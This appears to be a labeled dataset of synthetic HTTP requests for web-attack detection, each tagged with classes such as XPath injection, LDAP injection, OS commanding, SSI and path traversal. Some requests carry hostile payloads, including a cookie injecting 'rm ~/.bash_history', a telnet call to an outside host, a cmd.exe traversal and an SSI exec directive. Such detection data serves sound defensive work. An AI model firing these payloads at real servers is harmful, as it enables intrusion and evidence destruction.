Cookie: eTAewteixeetwee=nd;das25=erjo;nb@AK8zVH=hasinulujk2;jk3sery1=1412056;atcef6efg5cf=ro5r-dzT;hhaerynci=mwqeti
Cookie2: $Version="66"
Date: Sat, 11 Aug 07 14:15:09 GMT
ETag: W/"@Ha_U7Oeumx8BwDN1Ut."
Expect: 100-continue
If-Modified-Since: Thu, 29 Sep 05 11:41:28 UTC
If-Unmodified-Since: Sun, 30 Jan 05 12:40:37 CET
If-Match: "iywafnV0PzMDZNYNNEuH"
If-None-Match: "sfeSHScfadv2-25T-S"
If-Range: Fri, 30 Dec 05 21:42:53 CET
Max-Forwards: 4
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: 692467-8,088341-5,956298-14
Referer: /akoug/esecb/esi1/z8so.sh
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.3 (Machintosh; U; PPC 8.0; qu-dF; rv:5.2.9) Gecko/85288457
UA-CPU: Sparc
UA-Color: color16
UA-Pixels: 298x509
Via: dSS/5.0 184.217.61.230:0321
Transfer-Encoding: identity
Upgrade: nsi/5.0
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Serial-Number: 9376895954650597
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44957
Start - Id: 48571
class: XPathInjection
PUT /cqFQ/iKY6e0inhMDVY/httpqwJBwCTyB/t9s/vr6eW@/Iszq/ekohl/e5tum8hrkeettovv1s/8exMA0bMOp1bgsoundW-L/bI4/eQXSEO8eS.exe? HTTP/1.0
Content-Length: 311
Content-Language: vr,g7i
Content-Encoding: identity
Content-Location: http://t8baAn.fr/92ivre/yD11Enar/heon/lszfu3.msf
Content-MD5: cnF6ZFR1aHJUclVhYWFlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Jul 07 15:24:11 UTC
Last-Modified: Tue, 16 May 06 13:14:40 CET
Host: 144.133.195.64:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 5.57.77.191
Cookie: LRrvarVdOO=n;gtP=651976;RYdKBe=35;H6e@B.PJ=1lTh6mh
Cookie2: $Version="071"
Date: Thu, 08 Mar 07 09:27:19 CET
ETag: "GSCXoNh2vkhzld6.WL"
Expect: oaln=atraiu;nomtiAaz=iaeh
From: rioL@tassgulsar.uk
If-Modified-Since: Tue, 04 Aug 09 05:48:08 GMT
If-Unmodified-Since: Tue, 01 Aug 06 02:02:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 260
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic NGFpOXJ1OGw6cnR0aHRncg==
Authorization: NTLM RW9kaXQ1Uk9uZU5oc2EyYTl0ZDdyR3NyeWloYWFpaW9pNnB0dGp5RHdz
Range: 9027-,6479-,26031-
Referer: /ehdtttne/haci/eonQf4/dtn4tc/AqfN2.dll
TE: trailers,gzip
Trailer: Date
User-Agent: Mozilla/1.7 (compatible; Konqueror/4.0; Linux i386; zaruareio)
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0026x0337
Via: HTTP/4.0 www.iynhoepn.jpg, FTP/1.9 www.Tomtrjy.gif, HTTP/2.7 53.239.190.128:3965
Transfer-Encoding: compress
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 024 102.167.137.67 "nvpacNsesceoTbreyoUd" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

535oEank=ixtTsC'   or  Sp1/a1/child::node()[processing-instruction()=6]    or  'eNI'  = '&yejiuy4qzlbn2e=p &rice7cvesesccf6=38&nraphedfeo4eB=lfDW&mkntmewahmfio=56210&at1aauaqyao=iAIe4bcyq1moE4&edDdttsro=c3bry6&pnMNVJbhttps=770724&iqEupdatebgsoundel=loonteed&ce9aTjnopeuaa=0ZLmd-t

End - Id: 48571
Start - Id: 37360
class: LdapInjection
GET /Soirct/eaeoioed/ueig.php3?9tsp19ep=oa6aet HTTP/1.0
Host: 114.148.105.208
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 117)(&(objectClass=dhho)(|(sn   =   ul1e)(cn=Ro    J*))
Accept-Language: 1isseosh-a0tht5tt, fann-aqf, lcnsfOl0-s6atcehi;q=0.7, Qearpaqe-a, oohvua8-si7tc;q=0.8
Cache-Control: no-cache
Client-ip: 212.91.230.42
Cookie: b.Xor2.0W1U=iSwixSUdef;rebVxesir=nmrtziqreIasnetcat;odunytic=ENe;keTef=5Cka
Cookie2: $Version="846"
Date: Mon, 21 Nov 05 24:12:39 CET
ETag: W/"1sErXqkCyucdByw"
Expect: dlbmij
From: 6eoetp@selEd.fr
If-Modified-Since: Sun, 13 Jul 08 07:37:20 CET
If-Unmodified-Since: Sat, 10 Dec 05 10:31:27 UTC
If-Match: "faIrcu1kqD01M9Vtdu2"
If-None-Match: "bkyjff2CWaAGk.uYfWxC"
If-Range: Mon, 15 Mar 04 13:17:35 CET
Max-Forwards: 4115
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic b3NuZXI6Z0FvdWU=
Authorization: Digest username="iteidhe"
Range: 257723-74,-66
Referer: http://www.5ee5o8n.fr/tret4hhz/spea/dltawiei.asp
TE: deflate,gzip;q=0.0,trailers
Trailer: Accept-Language
User-Agent: iahptianEt/0.1.4.6
UA-CPU: x86
UA-Disp: 794,0889,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5121x090
Via: 9.0 www.0pgsq9vw.htm:072, FTP/7.9 47.248.163.219:382
Transfer-Encoding: compress
Upgrade: aite/2.5
Warning: 063 211.26.149.166 "smbe8tiNrn" "Sat, 11 Mar 06 17:33:18 CET"
X-Forwarded-For: 231.143.90.28
X-Serial-Number: 30089699
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 37360
Start - Id: 38021
class: LdapInjection
GET /HimgEtlibmmR@dJ6ds/EeGeOJDM9RX/joeNGYSh7group by.php?feea=ieoet&lonhlntlvpnkna=2en46eektGvs8elr7d&SwCWd1ou0okss=%29%28++++%7C++%28cn%3D*o+%27brien*++%29%28mail++++%3D*o+%27brien*++++%29&Ntewtid=o&trgnutet8wcii=1395149906&thaei3t=0v HTTP/1.0
Host: www.onwdn.de
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-ce, us-ascii;q=0.1
Accept-Encoding: 
Accept-Language: 9e8Yzc-sy, eai-roldn;q=0.9, y-et, elf5tve-idhoeoB;q=0.0, serila0-id0nnTle
Cache-Control: arftfei='E61abr7c'
Client-ip: 32.153.101.139
Cookie: VbGBZFL=iy09orETo
Cookie2: $Version="157"
Date: Tue, 02 Oct 07 19:34:02 UTC
ETag: "CWR7-aWJfea7H_qYuD"
Expect: 4taRX=risno5L4
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 08 Apr 10 12:26:59 GMT
If-Unmodified-Since: Sun, 13 Jan 08 22:09:00 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 06 Mar 04 13:42:52 CET
Max-Forwards: 986
MIME-Version: 8.2
Pragma: ynot=Ensd
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: Basic Y2RvOGF0NG46aXN6Y2lF
Range: 663102-
Referer: /omun.tiff
TE: trailers,chunked;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: 41eiesnizanf0troas8
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: FTP/4.6 129.247.36.140
Transfer-Encoding: deflate
Upgrade: obs/0.4, gbr/5.8
Warning: 871 35.130.69.56 "hdEagaRnal3ae" 
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38021
Start - Id: 36842
class: OsCommanding
POST /l3fXnJOF7WWs1UNwA/tkfzT.n@ad.v2N/nmtbmSrUC4nm98twe/6piha/sOFouZmOrfMTt/eyvbK1XZcuoTCgF/7Tyen.bin? HTTP/1.0
Content-Length: 144
Content-Language: Ftnmo5,0ayee,oe
Content-Encoding: compress
Content-Location: http://blke.fr/eDs4N/eiftl/samHb5/snshot/onoHe.cgi
Content-MD5: dG43bW9tamdjYW1lZWJldA==
Content-Type: application/x-www-form-urlencoded
Host: 22.197.20.93
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cookie: 1zd=';  rm ~/.bash_history   ;
Date: Wed, 17 Mar 04 01:49:50 CET
ETag: W/"hsGfq4sD9OHtQhvXSnx"
If-Modified-Since: Thu, 10 Apr 08 23:10:04 CET
If-Unmodified-Since: Fri, 04 Jun 04 05:09:34 CET
If-Range: "it9ECqM8XXSp3ys.A_NP"
Max-Forwards: 053
Authorization: Digest username="ehowt"
Referer: http://Aurts5.gov/kEr7ugti/tseor9/ts3ahmi.css
User-Agent: Mozilla/7.3 (Windows; U; WinNT 2.3; o9-Im; rv:3.9.7) Gecko/34602531
Transfer-Encoding: identity

sbiitn=riryb)ubody=8nfk&mdehwfrqeung=documents4n<&nfaeeoLin=eia&6TagIYvarbgsoundQ=6&q6RrnNec=0d8JWoAEt1M&aqrshvixtea=hvw$esformauiuna]

End - Id: 36842
Start - Id: 50005
class: XPathInjection
PUT /5OnVyLR4/coro.jpeg? HTTP/1.0
Content-Length: 78
Content-Language: empr5t
Content-Encoding: compress
Content-Location: http://www.seeloP.cz/x2tHr.css
Content-MD5: aGF1MWV0enJudGxzYWZ0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Jan 05 10:50:29 GMT
Last-Modified: Sun, 21 Jan 07 11:11:20 UTC
Host: www.yt7nosz.st:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: utf-8, us-ascii
Accept-Encoding: *;q=0.9
Accept-Language: coYtmni' or   (i     <     count(5m/child::text()) and j     < count(y5eorz/child::comment()) and   k  <  count(dg3/child::*)    )    or '0rvAn' =  '     jeoln1l'   or
Cache-Control: no-cache
Client-ip: 63.249.228.10
Cookie: cD_.E=NetrtBn9yhew;iho=oineb;leobseb=r;Vuhe=09;lc=5863;7n4bg=rmGtdt4qzyer
Cookie2: $Version="434"
Date: Fri, 16 Oct 09 21:16:46 UTC
ETag: W/"_2XPRTZTzEEtnxCG"
Expect: SEeuet
From: etjd@onalE.be
If-Modified-Since: Sat, 09 Dec 06 13:36:38 GMT
If-Unmodified-Since: Thu, 23 Aug 07 04:06:21 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 03 Jan 10 01:01:45 CET
Max-Forwards: 794
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="Esaae"
Authorization: NerEsU dwsbmgda=8ariaptm
Range: 1-0902
Referer: http://ltyne.be/itepe/nhob.fgf
TE: deflate
Trailer: If-Match
User-Agent: n2T@hAC6 http://www.lwhie.fr
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Pixels: 957x1532
Via: 0.6 www.aen1dju.html, 8.8 239.201.126.37:6113, 6.8 42.12.3.62
Transfer-Encoding: tarr
Upgrade: ihrzto/2.6, omrie/3.9, eairtL/8.4, nh9aUe/7.3, nbnau7/0.7
Warning: 930 www.EosRdrh.tiff "etleodlp" 
X-Serial-Number: 1430325
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ps2mY=j6pEhe&e4=p(&rsOnotmkjljt=faRat5hovTzD)5e&3g7t6at=MeernegemurtiDskz1

End - Id: 50005
Start - Id: 43892
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.4oItzGgfa.com
Connection: close
Accept: application/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 132.194.132.1
Cookie: Aee0tan=2C3VJUh6zzD;DnioypOst=-tbreabu;tuanrlr=lsobvmeriojde;W.-BU-LVLa6q=ioydsu9gdniPyscriptMiw ;iegcbsnac=t8e5adqieeprPE;gionss=irlueetEra6
Cookie2: $Version="05"
Date: Fri, 07 May 04 21:21:24 GMT
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: 100-continue
From: 9HsNes@1a7h.biz
If-Modified-Since: Mon, 22 Nov 04 13:02:31 UTC
If-Unmodified-Since: Wed, 05 Dec 07 08:09:59 UTC
If-Match: "8Srd7BqaI14qLa_DNIbX"
If-None-Match: "xmMfbKlWK96TC2ZB"
If-Range: Wed, 13 Oct 04 08:34:10 GMT
Max-Forwards: 7
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic b3NieWVHOnNhdmU=
Range: 3121-127,822-
Referer: /g4ore.wmn
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: CaHgieuew/7.0.6
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 349x5070
Via: HTTP/0.7 221.188.184.70
Transfer-Encoding: np1euh; iwnbdsd7=rBi7ta
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 245906346530085
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43892
Start - Id: 40285
class: SSI
GET /0Fomz7/oR/Aoihe3mhyTp/iJCDQp/t-erzGfJNM_KQIEV/narneaetjtciti92.asp?ZxzNjgeCYU=3lIJ5LOW&ulsoadmurrch=%3C%21--++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5Csj%5C7ntN%5ClsrEd.exe++++d%3A%5CnelttoOen%5Cwww.arveil.org%5CWUaie%5Cdatabase.mdb+++++%2Fx++exporttofoxpro%22--%3E HTTP/1.1
Host: 88.72.187.160:60
Connection: close
Accept: text/*;q=0.6, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.6, compress;q=0.6, compress;q=0.4, gzip
Accept-Language: t-7idsOl;q=0.8, bygj-nr;q=0.9, o-rn;q=0.9
Cache-Control: no-store
Client-ip: 96.240.98.126
Cookie: sv=35947383;zeisensisir=yuace7mfhuct4dbst1;hgaisieEcqsl=1755;dtgtWCmt=jNdmgEvp;1er9=senaiacrr6tf;tfnrttthinrt=hsamenwfromaTbetweenOepyon 
Cookie2: $Version="976"
Date: Fri, 09 Apr 10 08:22:18 GMT
ETag: W/"ADBuQO9tIlPS2mf"
Expect: glFeoe
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Sat, 21 Jul 07 03:57:47 GMT
If-Match: "_@HsKmpnxKATySdtY"
If-None-Match: "HMbRdr-E9-kscoXdXZ4"
If-Range: Sun, 09 Jul 06 03:16:34 UTC
Max-Forwards: 393
MIME-Version: 9.5
Pragma: s9lyr=u
Proxy-Authorization: NTLM bzZlZ3Bvbm0xdHRoaWZHYWFjaWVtYTZsb2VxYm13d0R0OWVwb2ZpT2Ju
Authorization: Digest opaque="fzlzeHe2"
Range: 37574-,839789-
Referer: http://www.et0ot.be/liroeo/3zrkesog/nnebsB/liia/dnialart.txt
TE: chunked;q=0.9
Trailer: Authorization
User-Agent: Mozilla/6.6 (Machintosh; U; Mac OS X 4.3; sD-hr; rv:7.2.6) Gecko/52175654
UA-CPU: MIPS
UA-Disp: 182,511,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2184x777
Via: 4.1 www.te1aciqr.jpg:36661, 6.5 118.17.15.185:35, FTP/8.4 30.74.40.227:8409
Transfer-Encoding: 9bitgr; atus=xavAdux
Upgrade: rdr/9.6
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 147.185.144.226
X-Serial-Number: 62707296438769057176
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40285
Start - Id: 49179
class: XPathInjection
GET /SimFTLxynPx/hhamoAoaBitecdvoNh/v@jKFgQ0b/tyqeT1jdBaGeAtneNe.png?4ln1lN=mnastaoNinputn&VskwupdateXxJNO-S=nxIqX58E3iRx&oaerocaea1=eiQZKN1qIR&uUoe=nslte%27+++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++%276egrlee%27++%3D+%27 HTTP/1.1
Host: www.iunetehech.cz
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, compress, deflate
Accept-Language: *
Cache-Control: o='t'
Client-ip: 194.207.45.230
Cookie: a27xhnztn=931495197;NTuiheos7Ve=sixofym ae;3g=O4h;St=eyveboot.inijb
Cookie2: $Version="1"
Date: Sun, 27 Jul 08 03:04:25 CET
ETag: "I4LM-0MgNgkmOnkc-s3"
Expect: 100-continue
From: iahsis@optiai.de
If-Modified-Since: Wed, 25 Feb 09 09:12:45 UTC
If-Unmodified-Since: Thu, 24 Jul 08 13:21:34 CET
If-Match: *
If-None-Match: "0Yg8f6_vXNgCq-M-twq0"
If-Range: Sat, 09 Jan 10 09:18:39 UTC
Max-Forwards: 1744
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: NTLM ZDB0NThybHNoMmFyZ2VIcmloaUVhWGVvb2VBbmNlbmVq
Range: 87-,-69535,7135-70843
Referer: http://ibt1an.biz/gzaeri/hqs3n.aspx
TE: chunked
Trailer: Host
User-Agent: Mozilla/7.0 (Windows; U; Win 9x 0.2; eR-6e; rv:3.9.2) Gecko/88294533
UA-CPU: x86
UA-Disp: 577,972,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 400x881
Via: diam/3.6 www.saZi.jpeg, hLotn/5.8 241.155.11.154, 9.3 26.163.213.25
Transfer-Encoding: o3hw
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 858 www.efhrohf.jpg "oIntdrztcn98" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49179
Start - Id: 38624
class: LdapInjection
GET /tP.FJpW/k5R-VWl.asp?tenns=%29+%28++++%7C++++%28+cn%3D*o+++%27brien*++%29%28mail%3D*o+++%27brien*++++%29++&aceheet2gd=n&qRWdwp-51FpS=j&V@Hpvardocumentlsid=ahqtitrH HTTP/1.1
Host: 151.31.186.108
Connection: PcCc
Accept: */*
Accept-Charset: windows-1253, x-mac-korean;q=0.9, windows-1258
Accept-Encoding: 
Accept-Language: ss5-gyEmep;q=0.7
Cache-Control: no-store
Client-ip: 146.170.36.188
Cookie: eDSoglauaoist0i=flGMlhWDa;ee=hut
Cookie2: $Version="788"
Date: Fri, 29 Jun 07 14:51:09 UTC
ETag: "KGrg9qHcq5lQEPfL.Dz"
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Wed, 02 May 07 18:39:13 GMT
If-Unmodified-Since: Mon, 01 May 06 24:03:05 GMT
If-Match: "oi2eAACtN9W1lC7bi"
If-None-Match: *
If-Range: *
Max-Forwards: 217
MIME-Version: 8.5
Pragma: ik=fo0f
Proxy-Authorization: enxz fsmta=lEitdeu
Authorization: i4mhnl mnihnewe=N2rh
Range: 907-3621,092-84571,369-460
Referer: http://senth1oy.be/ai9tS/mwn61oi/Eny7ny.jpeg
TE: trailers,trailers
Trailer: If-Range
User-Agent: 5GL6FmB http://www.yrdc.ch
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/0.9 137.63.203.23, Raae/5.9 www.alf7.js, 8.4 69.166.218.179
Transfer-Encoding: deflate
Upgrade: legAa/6.2, aea/3.6, 9ebe/1.1, coNl/5.9
Warning: 385 www.ietrrth1.htm "wefuh94ogoiYectles" 
X-Forwarded-For: 103.229.175.133
X-Serial-Number: 325446948
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38624
Start - Id: 43123
class: OsCommanding
GET /-QZ@ftp-KP8xp_j.gif?ka5usosia=kl3i+&ih5aLnerOldlms=5retcunAe&vzSJ=%5C%22++++%5C%3B++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+++++www.veatleteasde.com++8603%5C%3B&lsqra=wipcGbsB&e9DowrbT=aso5lhdeletenXa-S&ordasiHWx=206275593&RnlyvOaorU8=56&lscriptYfIQbRKt=8456540&Yevale6=%40sctdrtm&agwrit=65 HTTP/1.1
Host: www.sisXzaoii.gov
Connection: close
Accept: */*;q=0.3
Accept-Charset: big5;q=0.4, iso-8859-1;q=0.0
Accept-Encoding: gzip, identity, compress, deflate;q=0.2, compress;q=0.6
Accept-Language: *
Cache-Control: min-fresh=563
Client-ip: 147.97.228.238
Cookie: gaco=256108903;oymtecoodNa=nobjecttobdtWers5;Rjsetenwae=eo
Cookie2: $Version="87"
Date: Fri, 17 Mar 06 07:09:40 GMT
ETag: W/"xZgq7w4Z0E7TALT-"
Expect: spfinn
From: ydaj1@ewfas0rh.de
If-Modified-Since: Fri, 07 Aug 09 06:35:31 UTC
If-Unmodified-Since: Thu, 20 Sep 07 04:27:00 GMT
If-Match: "3dNO5YgDRuatuL8yL"
If-None-Match: "kdmInhjGX8@PH0Zx1S"
If-Range: Wed, 23 Apr 08 17:08:31 UTC
Max-Forwards: 899
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: nsaozi heu6t=yTsa
Authorization: Digest uri=http://ehobetU.st/3ngtancL/trar.php4
Range: 94856-,22-022
Referer: http://aecwNw.it/rsaYsn/dpht5po/atrskan.cfm
TE: deflate;q=0.7,deflate,deflate
Trailer: Host
User-Agent: Mozilla/2.4 (Windows; U; Win 9x 0.1; s8-et; rv:2.3.1) Gecko/48979543
UA-CPU: Sparc
UA-Disp: 060,1841,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 0.7 154.236.137.51
Transfer-Encoding: EsteHT; IkaUccki=nNH0W
Upgrade: gst/8.6
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 209.100.60.54
X-Serial-Number: 231798615796568
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43123
Start - Id: 48639
class: XPathInjection
POST /ejN4h2acupg2ahwe/smBPyX@6/tnpeedoU.aspx? HTTP/1.1
Content-Length: 251
Content-Language: vhdIuehq
Content-Encoding: identity
Content-Location: http://nzeo.org/phtvdA/8autmi/6auitr.php
Content-MD5: dHlsc2ozakhud0VJaXllYw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Apr 07 22:41:37 GMT
Last-Modified: Mon, 21 Jul 08 15:39:47 GMT
Host: www.6sttoylyn6.uk:53801
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.1, x-mac-japanese
Accept-Encoding: 
Accept-Language: iyrnakf-eejgnr;q=0.0
Cache-Control: no-store
Client-ip: 41.88.127.250
Cookie: SI6xmlIhU=6889386;xen6cnc=m"i4cIlipobjectoOSs]rr;btI5htii=8854978
Cookie2: $Version="469"
Date: Tue, 31 Oct 06 21:51:34 UTC
ETag: W/"YKFJkoH9cKAkRI90WU"
Expect: 100-continue
From: Ninoyjig@whephoIrat.uk
If-Modified-Since: Tue, 14 Jun 05 15:59:49 GMT
If-Unmodified-Since: Thu, 22 Sep 05 12:48:07 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Jul 06 06:34:57 GMT
Max-Forwards: 3520
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bGFhZTpubFJpMG5lYw==
Range: -046912,8351-4,007308-22
Referer: /adra/a5wptj/mcsa/i1bst/pseshtij.cgi
TE: gzip;q=0.1,trailers
Trailer: Range
User-Agent: Mozilla/3.8 (Machintosh; U; PPC Mac OS X 5.8; ou-rl; rv:1.6.0) Gecko/48887767
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: FTP/8.3 www.u3ldr.html
Transfer-Encoding: compress
Upgrade: ohth/5.2
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jeemIem75b=s9o'   or     6    <     count(path/child::*)     or     '2sera4uh' ='&slyrFsnFortztam=povmdtsA1&Iaussoe=3AHignm4ifrf&ogd=6517630&vfcirT=9&altwA=teet9qrt9set&SFbnullSE43=irYdoi&2aqamor5aiiu2=s>nd&8eadminXchild0-=1992

End - Id: 48639
Start - Id: 36527
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.0
Host: www.sltenx.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.8
Accept-Language: hToe3mrn-dAW, eodmerUt-chspe;q=0.0, slsist-otoec, erE8-e5
Cache-Control: max-stale
Client-ip: 65.215.179.86
Cookie: HERng=1adirjn]nceLerippasswdyls
Cookie2: $Version="17"
Date: Thu, 22 Jun 06 15:35:43 CET
ETag: W/"MpfI0bsb1HguCI@Llqy"
Expect: 100-continue
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Thu, 28 Apr 05 10:29:20 GMT
If-Unmodified-Since: Tue, 09 Dec 08 06:29:44 UTC
If-Match: "AaDX_.iFnji7xVF"
If-None-Match: "cN7vKw@Q2CXVi1BJhpXV"
If-Range: Wed, 07 Oct 09 24:33:45 UTC
Max-Forwards: 450
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: Basic ZWFwZWVWdXM6a3Q3b2JZ
Range: 17-
Referer: http://www.lenaltat.com/taeertsA/mtm0/Uaen/Ehtdpbn.php4
TE: deflate;q=0.8,gzip
Trailer: Host
User-Agent: Mozilla/9.8 (Windows; U; WinNT 8.1; et-ee; rv:9.9.8) Gecko/82779699
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 547x5195
Via: 8.9 www.kttt.shtml:6, em6/1.6 194.252.1.84, 3.0 38.37.57.232
Transfer-Encoding: gzip
Upgrade: oeua/5.5, otN/2.6, 2ts/2.1, ebetns/4.3, r2h/4.2
Warning: 048 www.e6frT.shtml:3476 "eA38Htn4cp4sefaeTVr" 
X-Forwarded-For: 150.134.65.172
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36527
Start - Id: 37988
class: LdapInjection
GET /nRdygiqsc6t4/8_gMxNfXwpQhFU-J4kHa/sRz@5SPrr0Vbx1c/oMc66grYh.K.gif?ieobizo8hmno=NrGntti8qaeiesGete&tue=o%25%2B5&ebhrtkgeckto=%29+%28++++%7C++++%28+++cn%3D*o%27brien*+++%29%28mail%3D*o++%27brien*++%29++&lneiHynew7malot=lfRxTVgTz6L HTTP/1.0
Host: www.eTea.it
Connection: aonsbru
Accept: application/postscript;q=0.6, video/*, video/mpeg;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 181.41.234.72
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="279"
Date: Tue, 25 Apr 06 03:44:58 CET
ETag: W/"X6DZQRvQqkAgn7Mj"
Expect: 100-continue
From: peRu9mr@dtroN.gov
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Sat, 25 Jul 09 24:58:52 UTC
If-Match: "DIrgNt38o2Ti-BleRxrL"
If-None-Match: "K8K7mnWMiM.L8t4B"
If-Range: Sun, 20 Jul 08 14:06:06 CET
Max-Forwards: 7
MIME-Version: 4.1
Pragma: eSNA='Qd'
Proxy-Authorization: Digest nc=Fe26BDc0
Authorization: Basic RWJlbjppdGV0
Range: 4893-,-7197
Referer: http://www.seezcao.fr/dhnh9h/yitkms/cmoob.nsf
TE: trailers,gzip
Trailer: Warning
User-Agent: tPiwyfs http://www.hrnljm.be
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8848x2681
Via: n30rte/9.4 www.aaVio5.shtml, trsalj/8.2 www.sns5inio.gif
Transfer-Encoding: identity
Upgrade: 9aaia/6.6
Warning: 919 www.siLiann.jpg:37 "teLew" 
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37988
Start - Id: 36321
class: PathTransversal
GET /eSsseeyMnIR.pl?scriptxE47=tatsc+5stimloh&DiVTikTOrtCad4=%26ie6+%26&kNperlpasswdqJ=s-F&xa=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&ilhhigtoqt4hr4=2&3t=0722951&n8sots5fte=e3tsekt%3E+wu%3Bw%3Bd%24 HTTP/1.0
Host: 247.189.92.108:80
